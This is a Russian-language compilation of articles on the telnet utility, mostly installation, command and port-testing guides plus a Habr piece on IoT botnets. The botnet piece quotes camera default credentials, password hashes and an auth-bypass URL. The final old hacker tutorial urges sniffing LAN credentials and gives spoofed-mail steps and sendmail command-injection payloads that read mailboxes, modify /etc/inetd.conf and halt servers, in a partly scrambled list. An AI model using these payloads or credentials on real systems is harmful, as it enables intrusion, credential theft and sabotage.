Как пользоваться службой telnet

Не все пользователи компьютеров знают о наличии скрытых служб, которые позволяют выполнять различные операции без использования специального программного обеспечения. В операционных системах Windows и Linux присутствует служба Telnet. В этом материале будет подробно рассмотрено назначение службы, команды, возможности и как с ней правильно работать.

Что такое Telnet

Telnet – представляет собой средство связи, которое устанавливается между терминальными устройствами.

Пример такой связи достаточно простой: персональный компьютер и сервер, который поддерживает подобный тип соединения. Телнет не является каким-либо программным обеспечением, это протокол связи.

Но необходимо отметить, что есть некоторые утилиты, которые работают посредством протокола «terminalnetwork».

Этот протокол связи используется в некоторых операциях:

• подключение к удаленному рабочему столу;
• проверка портов на возможность подключения;
• использование программного обеспечения, которое доступно только на удаленных машинах;
• применение системных каталогов, которые могут быть открыты только с использованием этого типа протокола;
• отправка электронной почты без использования дополнительного софта;
• пользователи, применяя этот протокол позволяет другим юзерам получить доступ к своему персональному компьютеру.

Установка и запуск

Скачивать утилиту не нужно, Telnet встроен в Windows 7/8/10 по умолчанию.

Инструкция по установке и запуску:

• для установки клиента нужно открыть «Панель управления»;
• далее выбираем «Программы» и «Включение и отключение компонентов»;
• в списке системных компонентов следует найти «Клиент Telnet»;
• отмечаем чекбокс и щелкаем «ОК», начнется процесс установки.

Для того, чтобы запустить клиент нужно открыть командную строку:

• в меню «Пуск», в поисковой строке ввести «CMD»;
• далее запускаем командную строку от имени администратора и вводим «Telnet»;
• после этого откроется окно утилиты.

Предлагаем ознакомиться с видео по установке Телнет в Windows:

Проверка порта

Проверка сетевого порта на наличие доступа к нему персонального компьютера в Telnet:

• в окне необходимо ввести команду telnetip;
• далее следует ввести IP адрес компьютера, например, 192.168.1.1. Посмотреть адрес можно в настройках сетевого маршрутизатора;
• в конце вводим порт FTP «21». Таким образом команда будет выглядеть так: telnet 192.168.0.1 21;
• после этого появится сообщение об ошибке, если порт недоступен или с просьбой ввести дополнительные данные, если порт открыт.

Команды Telnet

Команды утилиты являются способом взаимодействия с ней. Для отображения списка всех команд, необходимо ввести «help». Далее подробно разберем основные команды:

• «open» — запрос позволяет выполнить подключение к удаленному серверу;
• «close» — прерывание процесса подключения к удаленному серверу;
• «set» — настройка параметров подключения к серверу;
• «term» — запрос предназначен для указания типа терминала;
• «escape» — задает управляющий символ;
• «mode» — выбор режима работы;
• «unset» — сброс ранее введенных параметров;
• «start» — запуск сервера;
• «pause» — временная остановка работы сервера;
• «continue» — продолжение работы сервера после паузы;
• «stop» — полное прекращение работы сервера.

Telnet в Linux

Как и в Виндовс, Телнет встроен в операционную систему Linux. Ранее он использовался, как стандартный протокол Telnet, теперь на его место пришел более улучшенный SSH. Как и с предыдущей ОС, утилита в Linux используется для проверки портов, маршрутизаторов и т.д.

Рассмотрим основные режимы работы:

• «построчный». Данный режим работы является рекомендованным. В этом случае редактирование запроса осуществляется на локальном ПК и отправляется на сервер только в том случае, когда она готова;
• «посимвольный». Каждый набранный символ в окне консоли отправляется на удаленный сервер. Здесь нельзя осуществить редактирование текста. При удалении символа с помощью «Backspace», он тоже будет отправлен на сервер.

  Что за формат DDS и чем его открыть?

Базовые команды в Linux:

• «close» — прерывание подключения;
• «encrypt» — включение шифрования;
• «logout» — выключение утилиты и закрытие соединения;
• «mode» — выбор режима работы;
• «status» — состояние соединения;
• «send» — отправка запроса телнет;
• «set» — настройка параметров сервера;
• «open» — подключение к удаленному серверу;
• «display» — отображение специальных символов.

Далее рассмотрим несколько способов применение утилиты в Linux:

• в окне консоли вводим запрос для проверки доступности сервера, например, «telnet 192.168.1.243»;
• далее проверим доступ к порту путем ввода запроса «telnet localhost 122» и «telnet localhost 21». На экране консоли появится сообщение о том принимает ли соединение какой-либо из портов;
• пример удаленного управления с помощью телнет. Для этого необходимо ввести в главном окне запрос «telnet localhost 23». «23» порт используемый по умолчанию. Чтобы произвести удаленное управление, необходимо установить на локальный компьютер «telnet-server». После этого появится сообщение с требованием ввода логина и пароля.

Недостатки Telnet

Главным недостатком данного протокола является – удаленное соединение без использования шифрования. Единственным моментом безопасности является авторизация пользователей в сессии телнет.

Но тем не менее логин и пароль также передаются в незашифрованном виде, тем самым доступ к ним можно так или иначе получить. Настоятельно не рекомендуется передавать какие-либо важные данные в локальных сетях.

Telnet не является внутренней или внешней командой

Данная ошибка появляется в том случае, если данный клиент не установлен на персональном компьютере. Необходимо выполнить следующие действия:

• открываем «Панель управление»;
• переходим в «Программы» и в левом столбце «Включение или отключение компонентов Windows»;
• в открывшемся окне находим «Клиент Telnet» и отмечаем данный чекбокс, жмем «Ок».

Второй способ:

• необходимо открыть командную строку от имени администратора;
• в окне требуется ввести «dism /online /Enable-Feature /FeatureName:TelnetClient»;
• если список компонентов не отображается, выполняем правку реестра;
• сочетанием клавиш «Win+R» запускаем утилиту «Выполнить»;
• раскрываем древо и находим «HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlWindows»;
• далее находим значение «CSDVersion» и параметр «200» меняем на «0».

  Худшие Android-смартфоны в истории

Источник: http://composs.ru/telnet-kak-polzovatsya/

Телнет и ботнет

Недавняя крупнейшая DDoS атака на DNS-серверы компании Dyn на Хабре не прошла незамеченной. Особенностью этого блэкаута стала широкое применение http запросов c IoT устройств и открытый 23-й tcp порт, используемый службой telnet.

Оказывается, телнет жив и хорошо устроился на встроенных системах и приманках. По злому-ли умыслу или человеческому недомыслию что это, глупость или измена? telnet порт был открыт и вовсю гадил у огромного количества IoT устройств, за несколько месяцев до блэкаута, но контр-мер не принимали, пока гром не грянул.

Теоретический минимум

Телнет появился в конце 1960-х, а первый стандарт с tcp/ip и виртуальным терминалом относится к 1983 г. Естественно, что в момент создания никого не заботил тот факт, что данные передаются в простом текстовом формате. Сетевой протокол tcp/ip в то время еще только созревал в ARPANET.

Telnet was designed to work between any host (i.e., any operating system) and any terminal. Its specification in RFC 854 [Postel and Reynolds 1983a] defines the lowest common denominator terminal, called the network virtual terminal (NVT). The NVT is an imaginary device from which both ends of the connection, the client and server, map their real terminal to and from. That is, the client operating system must map whatever type of terminal the user is on to the NVT. The server must then map the NVT into whatever terminal type the server supports.

Как и многие популярные протоколы сети интернет, он тоже прост до архаичности и непотопляем в силу своей простоты. И точно так же часто используется не по назначению.

(5:574)$ grep -w ^telnet /etc/services
telnet 23/tcp # Telnet
telnet 23/udp

Любопытный факт, оказывается есть такая штука как telnets, но что это за чудо, сказать не могу. Даже поисковики удивились.

(5:575)$ grep -w ^telnets /etc/services
telnets 992/tcp # telnet protocol over TLS/SSL
telnets 992/udp

Вот весь нехитрый список команд:

EOF 236 end-of-file
SUSP 237 suspend current process (job control)
ABORT 238 abort process
EOR 239 end of record
SE 240 suboption end
NOP 241 no operation
DM 242 data mark
BRK 243 break
IP 244 interrupt process
AO 245 abort output
AYT 246 are you there?
EC 247 escape character
EL 248 erase line
GA 249 go ahead
SB 250 suboption begin
WILL 251 option negotiation
WONT 252 option negotiation
IX) 253 option negotiation
DONT 254 option negotiation
IAC 255 data byte 255

Телнет поддерживает полу-дуплексный, по-символьный и по-строчный режимы ввода, по умолчанию программа использует последний. Из ман страницы.

Once a connection has been opened, telnet will attempt to enable the TELNET LINEMODE option. If this fails, telnet will revert to one of two input modes: either ‘‘character at a time’’ or ‘‘old line by line’’ depending on what the remote system supports.

Используется внутриполосная сигнализация — команды и данные передаются в одном потоке.

Телнет honeypot

В прошлом году специалисты крупного чешского DNS провайдера NIC.CZ, выкатили приманку — honeypot и стали наблюдать за трафиком.

Оказалось, что telnet трафик на три порядка превышает трафик по ssh. На вертикальной шкале графика количество попыток входа в систему для telnet и поданных команд для ssh. Шкала логарифмическая. Кликабельно.

Число уникальных IP.

География стран, кликабельно. Обратите внимание на совпадение с результатом Shodan, ниже по тексту.

• 
• Платформа основных устройств, кликабельно.
• 

На первом месте RomPager/4.07 HTTP server — дырявый встроенный веб сервер, часто используемый в домашних роутерах. Таких, по словам аналитиков из Allegro Software Development, может быть 75 миллионов. На втором месте популярный тулкит gSOAP/2.7, а бронзовая медаль досталась H264DVR 1.0 — RTSP (Real Time Streaming Protocol) серверу видеорегистратора.

Собственно, CCTV камеры обозначены неблагозвучным Dahua Rtsp Server и также имеют проблемы с безопасностью. С мая 2016 г. эти устройства резко повысили свою активность, временами было зарегистрировано 8 тыс. уникальных IP адресов за сутки.

Несмотря на локальный характер эксперимента, выводы о надвигающихся крупномасштабных IoT угрозах будто напрашивались.

Обработав данные с более чем 6 миллионов уникальных IP адресов, чешские аналитики четко выявили тенденцию: встроенные системы наиболее уязвимы, особенно CCTV видеокамеры, которые зачастую вырождаются в монокультуру с одинаковым оборудованием, начинкой, списком уязвимостей. Первый звоночек прозвучал тихо и его не услышали.

Огласите весь список

Эксперты компании Rapid7, используя инфраструктуру своего Project Sonar, провели глобальное сканировaние портов по всему миру, проверив основные tcp порты IPv4 диапазона. Исследование оказалось довольно подробным и интересным.

• 15 миллионов хостов с открытым telnet портом. (Карл!)
• 11 миллионов хостов с открытым доступом к RDBMS
• 4.5 миллионов хостов с открытым доступом к сервисам печати.

Вот как распределилась первая десятка tcp/ip протоколов, по величине.

Port Protocol Number Percent
80 HTTP 76,266,507 19.89%
443 HTTPS 50,507,072 13.17%
22 SSH 21,692,582 5.66%
21 FTP 20,375,533 5.31%
25 SMTP 19,888,484 5.19%
8080 http-alt0 17,477,357 4.56%
23 telnet 14,871,682 3.88%
53 DNS 12,602,272 3.29%
143 IMAP 11,467,158 2.99%
110 POP3 11,073,439 2.89%

Вся тридцатка протоколов в таблице..

Седьмое место в общем зачете, кто бы мог ожидать? А если объединить все http* в одну категорию, то телнет и вовсе будет на пятом месте! Как видите отставание от ssh совсем небольшое. Это был второй звоночек, но и его никто не услышал.

That said, the fact that we cannot seem to stomp out telnet in production completely is both frustrating and worrying. According to our scans, there are over 14 million devices that appear to be offering telnet services on the internet today.

100500 уязвимых CCTV видеокамер

Специалисты из Flashpoint по следам ботнета Mirai прошерстили интернет на предмет обнаружение интересных свойств CCTV видеокамер XiongMai Technologies и Dahua. Как любит говорить Михаил Задорнов «держитесь за стул, иначе вы упадете».

По данным на 6.10.2016 более 515 тыс. устройств с веб сервером uc-httpd 1.0.0.0 подвержены одновременно CVE-2016-1000245 и CVE-2016-1000246.

Уязвимость CVE-2016-1000245 — это просто караул. На всех девайсах один и тот же рутовый пароль xc3511, который нельзя изменить так как на системе нет команды passwd. Служба telnet включена и из настроек никак не отключается, разве что удалить инит скрипт из /etc/init.d/rcS.

/etc $ cat passwd
root:absxcfbgXtb3o:0:0:root:/:/bin/sh
/etc $ cat passwd-
root:ab8nBoH3mb8.g:0:0::/root:/bin/sh All internet-capable XiongMai Technology boards running the DVR/NVR CMS (Also known as NetSurveillance) enable the telnet service to run on the primary ethernet interface. This service is run via /etc/rcS and cannot be disabled. The user «root» has a hardcoded and immutable password of xc3511. These systems do not have the «passwd» tool installed and the root

password cannot be changed from command line nor from the web interface.

Уязвимость CVE-2016-1000246 не уступает первой. Можно обойти ввод учетной записи и пароля, если зайти через http:///DVR.htm.

Many known XiongMai DVRs, NVRs and IP Cameras run «CMS» (also called NetSurveillance) built by XM Technologies. This software is also used by all downstream vendors of XiongMai Technologies. The login page for these devices can be bypassed by simply changing the from http://_IP_/Login.htm to http://_IP_/DVR.htm. This allows you access to view all the camera systems without authentication. Furthermore, there is no logging on the system so user management is not possible. The web-server version on all affected products is the same; “uc-httpd”. All products currently affected by CVE-2016-1000245 are also vulnerable to the authentication bypass.

Надеюсь, что в наших аэропортах не установлены эти самые XiongMai и Dahua.

Итоги

Телнет оказался очень живуч и даже спустя десятилетия после появления ssh не спешит покидать сцену. Он вполне пригоден, даже полезен, если его использовать по назначению — в пределах прямой видимости между клиентом и сервером. Дело, однако в том, что телнет вырвался на волю из серверной, как джин из бутылки и уже начал пошаливать. По чьей вине это случилось?

С моего забора вижу так. Во-первых, основная вина на горе-производителях дырявых IoT устройств и встроенных систем. Все эти XiongMai и Dahua. С опозданием, но производитель отзывает из продажи IP-камеры. Однако, беглый обзор новостей показывает, что PR-отделы китайских компаний и сотрудники министерства коммерции не даром едят свой хлеб.

Мне это отделение известно! Там кому попало выдают паспорта![1]

Во-вторых, конечно виноваты регулирующие органы — те, кто их сертифицирует и дает положительное заключение. Из отчета Rapid7.

These results all speak to a fundamental failure in modern internet engineering. Despite calls from the Internet Architecture Board, the Internet Engineering Task Force, and virtually every security company and security advocacy organization on Earth, compulsory encryption is not a default, standard feature in internet protocol design. Cleartext protocols “just work,” and security concerns are doggedly secondary.[2]

В-третьих, подрядчики и интеграторы, которые засадили весь мир этими CCTV камерами. Если не принять законодательные меры, регулирующие ИТ безопасность интернет-утюгов и видеокамер, то блэкауты станут все чаще и круче, как кайдзю.

P. S. Пока набирал текст, возникло сильное желание — проверить домашний роутер nmap-ом и прочими инструментами. Проверил и успокоился, но видимо ненадолго.

Использованные материалы

1. ↑ Из романа М. Булгакова «Мастер и Маргарита».
2. ↑ Результаты говорят сами за себя. Несмотря на все призывы IAB, IETF и практически всех экспертов по безопасности, обязательное шифрование еще не стало нормой при разработке интернет стандартов. Обычный текст, «просто работает» и из-за этого игнорируются требования безопасности.

Источник: https://habr.com/p/315266/

Методы подключения к удаленным устройствам при помощи команды telnet

Расшифровывается название протокола как Terminal network, что в дословном переводе означает – терминальная сеть.

Что собой представляет Terminal network

При помощи команды telnet, несмотря на её невысокую функциональность, можно выполнить достаточно много задач, таких как:

• проверка соединения с сервером при помощи открытого порта;
• подключение к удаленным устройствам (модем, роутер или свитч) для передачи команды (перезагрузки, выключения или получения логов);
• обновление микропрограммы (прошивка) сетевого оборудования или мобильного телефона;
• передача файлов.

Многие считают, что такое соединение работает, как и большинство сетевых служб, по принципу клиент-сервер. Однако это не так. telnet – полностью двусторонняя служба с одинаковыми функциями и уровнями доступа.

Что интересно, сама программа включает минимальный набор функций, который содержит только опцию подключения и процесс аутентификации (проверки подлинности имени пользователя и пароля, которому разрешен доступ). Все остальные опции, как командные, так и системные, вызываются подключаемыми приложениями.

Как работать с оболочкой?

Для того чтобы использовать функции команды telnet, нужно воспользоваться командной строкой. В седьмой версии Windows и выше служба по умолчанию отключена и автоматически при вызове команды не запускается. Поэтому необходимо выполнить следующие действия, чтобы включить telnet:

1. В строке поиска меню «Пуск» набрать фразу «компоненты Windows»;
2. Запустить найденный элемент управления;
3. Найти в появившемся окне «Клиент telnet» и активировать его галочкой;
4. Подтвердить действие включения компонента кнопкой «ОК»;
5. В Windows 7 нужно набрать в строке поиска «Командная строка». В более старых версиях операционной системы достаточно вызвать командную строку (Меню пуск – Пункт «выполнить» – «cmd»);
6. В появившемся окне необходимо ввести «telnet» для входа в систему терминалов.

Как управлять службой?

После того, как вы зайдете в службу управления терминалом Windows, необходимо знать несколько команд для возможности управления. Есть такие варианты получения списка управляющих ключей:

• нужно набрать в командной строке «telnet» для того, чтобы запустить его, а затем «help» для ознакомления с опциями;
• в Windows можно выполнить эту же функцию другим способом, набрав «telnet /h».

Если вы знакомы с опциями, можно сразу подключаться к нужному ресурсу с указанием необходимых данных. В этом случае сервер для соединения – «smatp.ya.ru» и порт – «25».

Итог:

Команда telnet очень проста в использовании и достаточно удобна. Однако в технологи её работы абсолютно не предусмотрена безопасность. Оболочка работает под Windows в полностью незащищенном режиме и без шифрования. Поэтому вместо этой функции уже достаточно давно используется ssh.

По принципу организации соединения они практически одинаковы. Но протокол ssh разрабатывался с учетом возможных технологий защиты. В некоторых случаях более простого способа соединения вполне достаточно, например, когда необходимо подключиться к оборудованию, чтобы загрузить в него новую прошивку или восстановить старую, а также для изменения конфигурации системы.

Если использовать сразу несколько протоколов для подключения, то быстрее, удобнее и безопаснее делать это через специальную программу, например «Putty».

Источник: https://WindowsTune.ru/prog/utility/komandy-telnet.html

Как пользоваться telnet

Telnet — это сетевая утилита, которая позволяет соединиться с удаленным портом любого компьютера и установить интерактивный канал связи, например, для передачи команд или получения информации. Можно сказать, что это универсальный браузер в терминале, который умеет работать со множеством сетевых протоколов.

Эта утилита очень часто использовалась раньше, для удаленного управления компьютером с Linux, но потом ей на замену пришел защищенный протокол SSH.

В этой статье мы рассмотрим что такое telnet, а также как пользоваться telnet для решения своих задач.

Что такое Telnet?

Как я уже сказал, эта утилита предназначена для создания интерактивного соединения между удаленными компьютерами.

Она работает по протоколу TELNET, но этот протокол поддерживается многими сервисами, поэтому ее можно использовать для управления ими.

Протокол работает на основе TCP, и позволяет передавать обычные строковые команды на другое устройство. Он может использоваться не только для ручного управления но и для взаимодействия между процессами.

• Для работы с этим протоколом мы будем использовать утилиту telnet, ею очень просто пользоваться. Давайте рассмотрим синтаксис telnet:
• $ telnet опции хост порт
• Хост — это домен удаленного компьютера, к которому следует подключиться, а порт — порт на этом компьютере. А теперь давайте рассмотрим основные опции:

• -4 — принудительно использовать адреса ipv4;
• -6 — принудительно использовать адреса ipv6;
• -8 — использовать 8-битную кодировку, например, Unicode;
• -E — отключить поддержку Escape последовательностей;
• -a — автоматический вход, берет имя пользователя из переменной окружения USER;
• -b — использовать локальный сокет;
• -d — включить режим отладки;
• -р — режим эмуляции rlogin;
• -e — задать символ начала Escape последовательности;
• -l — пользователь для авторизации на удаленной машине.

Это все, что касается команды telnet для установки соединения. Но соединение с удаленным хостом, это только полдела. После установки подключения telnet может работать в двух режимах:

• Построчный — это предпочтительный режим, здесь строка текста редактируется на локальном компьютере и отправляется только тогда, когда она будет полностью готова. На такая возможность есть не всегда и не у всех сервисов;
• Посимвольный — все набираемые вами символы отправляются на удаленный сервер. Тут будет сложно что-либо исправить, если вы допустили ошибку, потому что Backspace тоже будет отправляться в виде символа и стрелки движения тоже.

Использование telnet заключается в передаче специальных команд. У каждого сервиса свои команды, но у протокола есть свои команды telnet, которые можно применять в консоли telnet.

• CLOSE — закрыть соединение с сервером;
• ENCRYPT — шифровать все передаваемые данные;
• LOGOUT — выйти и закрыть соединение;
• MODE — переключить режим, со строчного на символьный или с символьного на строчный;
• STATUS — посмотреть статус соединения;
• SEND — отправить один из специальных символов telnet;
• SET — установить значение параметра;
• OPEN — установить подключение через telnet с удаленным узлом;
• DISPLAY — отобразить используемые спецсимволы;
• SLC — изменить используемые спецсимволы.

Мы не будем рассматривать все команды, поскольку они вам вряд ли понадобятся, а если и понадобятся, то вы легко сможете их найти в официальной документации.

Как пользоваться telnet?

Дальше мы рассмотрим как использовать telnet для решения ваших задач. Обычно, утилита уже установлена в большинстве систем, но если это не так, то вы можете установить telnet из официальных репозиториев, например, в Ubuntu:

sudo apt install telnet

Теперь перейдем к применению утилиты. Изначально она использовалась для удаленного управления компьютером, но поскольку потом был разработан более безопасный протокол SSH, использовать ее перестали.

1. Доступность сервера

Утилита все еще может быть полезной при поверке доступности узла, для этого просто передайте ей ip адрес или имя хоста:

telnet 192.168.1.243

Для этого не обязательно применять telnet, есть ping.

2. Проверка порта

1. C помощью telnet мы можем проверить доступность порта на узле, а это уже может быть очень полезным.

   Чтобы проверить порт telnet выполните:

2. telnet localhost 123
   $ telnet localhost 22
3. 
4. В первом случае мы видим, что соединение никто не принимает, во втором же выводится сообщение об успешном подключении и приветствие SSH сервера.

3. Отладка

Чтобы включить режим отладки и выводить более подробную информацию во время работы используйте опцию -d во время подключения:

sudo telnet -d localhost 22

4. Консоль telnet

• Использование консоли telnet тоже важный момент в разборе как пользоваться telnet. В основном режиме вы можете выполнять команды, на удаленном сервере, если же вы хотите адресовать команду именно telnet, например, для настройки ее работы, необходимо использовать спецсимвол для открытия консоли, обычно утилита сразу говорит вам что это за символ, например, по умолчанию используется «^[«:
• 
• Для его активации вам нужно нажать сочетание клавиш Ctrl+[, затем вы уведите приглашение ввода telnet.

Чтобы посмотреть все доступные команды, вы можете набрать ?. Например, вы можете посмотреть статус подключения:

telnet> status

Здесь есть и другие интересные возможности. Такие вещи можно проделывать при любом подключении с помощью утилиты telnet.

5. Посмотреть сайт telnet

Один из распространенных способов использования telnet — это тестирование сайта из консоли. Да, красивую веб-страницу вы не получите, но можете вручную собрать запросы и видеть все переданные сервером данные.

1. telnet opennet.ru 80
2. Затем наберите команду веб-серверу:
3. GET /
4. 
5. Веб сервер вернет полностью страницу, а также заголовки, которые необходимы для ее отображения браузером.

6. Удаленное управление telnet

Настоятельно не рекомендуется использовать небезопасный telnet для удаленного управления, потому что все команды и пароли могут быть прослушаны сторонним пользователем.

Но иногда, например, для роутеров telnet все же используется для удаленного управления.

Все работает точно так же, как и для других подключений, только нужно использовать порт 23, а на удаленном компьютере должен быть установлен telnet-server:

telnet localhost 23

Тут порт можно даже не указывать, потому что по умолчанию будет использоваться именно 23. Далее, вам нужно ввести логин и пароль, а затем вы сможете выполнять команды в удаленной системе.

Выводы

В этой статье мы рассмотрели примеры использования telnet, а также что представляет из себя эта утилита, хотя она уже не используется по своему основному назначению, но до сих пор может быть полезной многим пользователям и системным администраторам. Если у вас остались вопросы, спрашивайте в х!

Источник: https://losst.ru/kak-polzovatsya-telnet

Инструкция: Как пользоваться TELNET — Илья Подгорнов

Для установки удаленного подключения по терминальному каналу связи используют утилиту Telnet. Инструмент применялся системными администраторами в повседневной работе, но на конец 2019 года почти не используется. Расскажем подробнее, что это за утилита и как она работает в семействе ОС Linux.

Что такое TELNET?

Telnet – это протокол, который используется для терминального соединения с оборудованием. Он «родился» в 60-х годах прошлого века. В то время не было Интернета, а его «дедушка» – Arpanet – еще использовался в военной сфере. 

При появлении глобальной сети и серверных платформ telnet начал использоваться для удаленного подключения к серверам Linux. Недостатком такого решения являлось отсутствие безопасности. Он передавал текстовые данные в прямом виде, без шифрования.

В результате его сменил SSH, который умеет шифровать информацию, обеспечивает надежность подключения и высокую скорость передачи данных.

Для чего применяется Telnet?

Как говорилось выше, для удаленного подключения к серверам используется протокол SSH. Функционал Telnet огромен – по сути, его сравнивают с браузером в консольном режиме. 

При работе с утилитой обращаем внимание на принципы работы с текстом. В утилите доступно два режима:

• В первом варианте команды передаются построчно, т.е. администратор вводит команду, и только после подтверждения она передается серверу. В случае какой-либо синтаксической ошибки она легко исправляется до момента отправки.
• Второй вариант – посимвольный. Каждое нажатие клавиши моментально транслируется удаленному хосту. Если допущена ошибка, то исправить ее не получится. 

Поэтому рекомендуется использовать ввод команд построчно.

Протокол используют как вспомогательную утилиту: например, для проверки доступности хоста, сокета и т.д. Рассмотрим основные возможности утилиты в подробностях.

Предварительная подготовка

По умолчанию пакет недоступен в операционной системе. Проинсталлируем его из официального репозитория.

Важно! Установка и дальнейшие операции с Telnet производятся на платформе под управление Ubuntu 18.10.

Открываем терминал и вводим:

sudo apt-get install telnet

Процесс займет не более двух минут, после чего приложение будет доступно. Для выполнения команд, описанных ниже, подразумевается, что пользователь зашел в клиент Telnet, т.е. набрал в терминале команду: telnet

Доступность точки

Первая опция – замена команды ping, которая направляет запросы до конечной точки и присылает ответы, отмеряя время.

Синтаксис следующий: telnet , где вместо пользователь указывает доменное имя либо IP-адрес хоста. Например, 

telnet 192.168.1.15

Учитывая, что утилита ping обладает более полезным функционалом, то администраторы предпочитают использовать Telnet для других задач.

Проверка сокета

• Второй вариант – проверка статуса порта. Синтаксис выглядит следующим образом:
• telnet localhost
• Набрав в терминале telnet localhost 22, в ответ получим приветственное сообщение от SSH сервера.

Пример использования утилиты

Режим «отладка»

1. Данная опция применяется, если необходимо получить подробный отчет о каждом этапе утилиты.

   Сисадмин набирает в терминале:

2. sudo telnet –d localhost 22
3. Теперь во время работы утилиты с портом 22 на экране будет выводиться подробная информация о каждом действии.

Режим рекомендован для ситуаций, когда возникает какая-либо ошибка. Отладка в таких случаях – незаменимый инструмент.

Режим «Тестирование»

Другой не менее популярный вариант – тестирование веб-ресурсов. Чем удобен такой режим? Клиентская машина обрабатывает только текст, без загрузки графики. Например, введём в терминале:

telnet opennet.ru 80

Утилита отправит запрос сайту opennet.ru на порт под номером 80. Далее вводим ключ: GET / для показа кода страницы.

Результат представится в виде текстового сообщения с «кракозябрами», поскольку утилита не работает с русскими шрифтами.

Пример обращения к сайту

Удаленное подключение

Данный режим устарел и не используется из-за своей ненадежности. Но в крайних случаях через telnet  можно подключиться к маршрутизаторам.

Важно! Для соединения на клиентской платформе должна быть установлена и активна серверная часть telnet. В противном случае в доступе будет отказано. 

• Наберём в командной строке:
• telnet localhost 23
• Если соединение установится, необходимо ввести учетное имя и пароль для дальнейшей работы с конечным устройством.

Консольный режим

Вышеуказанные способы предлагали использование утилиты как средства обработки информации и удаленного подключения.  Если необходимо зайти в консоль telnet, то набираем имя без каких-либо ключей в терминале.

Для просмотра доступных команд через терминал вводим ключ «?».

Перечень функций

Важно! Режим доступен при любом удаленном подключении через telnet.

Для выхода из консоли вводим exit.

Рекомендации

Перечислим принципы работы с утилитой.

1. Никогда не использовать telnet для удаленного подключения, кроме экстренных случаев. Как уже говорилось выше, это связано с тем, что данные передаются в открытом виде. Соответственно, злоумышленник может легко перехватить трафик и узнать учетные данные для подключения.
2. Для удаленного подключения использовать современную версия протокола SSH (на конец 2019 года – это SSH2). Он использует шифрование и не подвержен взлому.
3. Деактивировать сервис на всех устройствах. Такой подход гарантирует, что злоумышленник не получит удаленный доступ к сетевому оборудованию.
4. Используем telnet в режимах отладки внутри локальной сети без доступа к внешним ресурсам.
5. Утилита рекомендуется для ручной проверки работоспособности протокола на определенном порте.

Советы обезопасят пользователя от сетевых атак и взлома через открытый протокол telnet.

Заключение

Публикация рассказала об одной из утилит, которая работает с протоколом Telnet. Перечислены способы реализации команд в информационных системах, а также приведены рекомендации по работе с утилитой.

Источник: https://Tehnichka.pro/telnet-on-linux/

Учимся использовать Telnet #1

Часть первая. Хочу но не
могу.

Зачастую меня спрашивают ,
«Как типа телнет поюзать?» Гммм, ну начнем с
того что «телнет» в привычном понимании — 
это всего лишь терминал ,который позволяет
несчастному юзеру  стать клиентом
какого-нибудь сервиса завязанного на TCP/IP.
Соответственно, для начала нужно определиться
,куда нам нужно)) и нужно ли
нам это…

Часто задаваемый вопрос номер два , а
где мне взять телнет клиента(терминал)? Ну
большинство начинающих странников (от слова
странный) даже не догадываются о том ,что телнет
клиент уже стоит на машине))) вызовите командную
строку дос и наберите там telnet (при условии ,что вы
уже подключены в сеть).

Добрый windows порадует вас
на редкость кривым клиентом, не имеющим
возможности  настройки типа терминала.Гораздо
более приятно пользоваться универсальным

клиентом SecureCRT (http://www.vandyke.com).Если

у тебя стоит Linux или BSD ,то ты уже достиг
могущества и тебе осталось в X`ах вызвать консоль
и набрать telnet. Коннект производится так:

telnet hostname/IP port

Где hostname/IP — имя хоста/IP на который ты решил
повеситься, port — номер порта, через который ты

собрался иметь удаленную систему.

Часть Вторая. Безвозвратно
погибшее прошлое.

Итак для чего изачально был
нужен этот чудо терминал? Для коннекта на порт 23,
который использует UNIX telnetd ,то бишь телнетный
демон.

В результате ,после ввода имени
пользователя и пароля ты вываливаешся прямо в shell
и можешь управлять(с правами назначенными тебе
админом) удаленной машиной так же , как будто ты
сидишь непосредственно за ней))).

Но в сем сервисе
было столько багов , что умные люди его давно
пофиксили и перешли на SSH. Основная проблема в
том, что юзер, нюхающий траффик в локалке по 23
порту может без проблем прочитать админовские
login&password (никакого шифрования) сплошной plain text.
БРРРРРР.

Но если ты ,находясь в локальной сети
своей организации, набрал telnet servername и увидел
нечто типа:
Linux RedHat 6.0
login
Значит ты теперь можешь смело включать сниффер
на 23 порт и ловить пакетики)) Ну за один рабочий
день ты наверняка получишь рутовый логин и

пароль)))

Часть Третья. SendMail
зачастую все еще дыряв.

Выглядит это примерно так:

telnet hostname 25
Trying 194.68.13.231…
Connected to gwx3.host.ru.
Escape character is '^]'.
220 gwx3.host.ru ESMTP Sendmail 8.9.3/8.9.3; Tue, 1 Aug 2000 08:54:59 +0400УРА ты повесился напрямую на 25 порт что дальше?
Дальше поздороваемся:

HELO domainname.com

(кстати имя домена может быть любое, но
желательно реально существующее к примеру YAHOO.COM)
далее пишем от кого письмо:

• mail from : billgates@microsoft.com
• rcpt to : username
• data — жмем Enter
• quit — валим отсюда))

— вот тебе и анонимность ….)))
теперь кому:
username — имя юзера которому шлем мыло, root — есть
всегда)))))
ну теперь сама мессага:
здесь печатаем текст .
для того чтобы закончить послание ставим .(точку)
и жмем Enter

ВСЕ!!! мы только что отправили
вполне анонимное мыло без всяких там клиентов)))
Радость в том ,что , зачастую, в sendmail есть
следующие баги:

1. mail from : sendername|any_command_as_U_want  — возможность

выполнения любой UNIX команды

1. rcpt to : username|any_command_as_U_want — возможность
2. 2. rcpt to : /any_directory/any_filename — возможность
3. /bin/ls /var/spool/mail>/home/httpd/html/users_info.txt — получаем
4. /bin/cat /var/spool/mail/username>/home/httpd/html/user_box.txt —
5. /bin/echo any_commands_here>>/etc/inetd.conf — добавляем

выполнения любой UNIX команды
направить мессагу напрямую в файл)))
Один гражданин ,назвавший себя VIRUSMAN недавно
прислал письмо где был следующий вопрос:
«А что мне это дает?» Ну что я могу сказать
………
В первом случае можно сделать нечто типа:
список почтовых юзерей
получаем контент ящика юзера.
произвольные команды в конец инет демона)).

/sbin/halt — паркуем сервак))) и т.д….

Во втором случае …)))
Ну попробуй подумать, пиши что хочешь и куда
хочешь))) Можно дописать произвольные команды

скажем в /etc/inetd.conf … все зависит от твоей

фантазии.

• Часть четвертая,
  прикладная пауза.
• Ты конечно уже юзал проги
  которые определят провайдера по IP)) Срочно сотри

их, больше никогда не юзай — вспомни про http://www.ripe.net.

На RIPE.NET запросы делаются так:
telnet whois.ripe.net 43
Trying 193.0.0.129…
Connected to whois.ripe.net.
Escape character is '^]'.

194.87.0.50

— пишем айпишник и получаем подробную
инфу кто это и откуда.

% Rights restricted by copyright.
See http://www.ripe.net/ripencc/pub-services/db/copyright.html

inetnum:     194.87.0.0 — 194.87.3.255
netname:     DEMOS-CORP
descr:       DEMOS Corporate Network
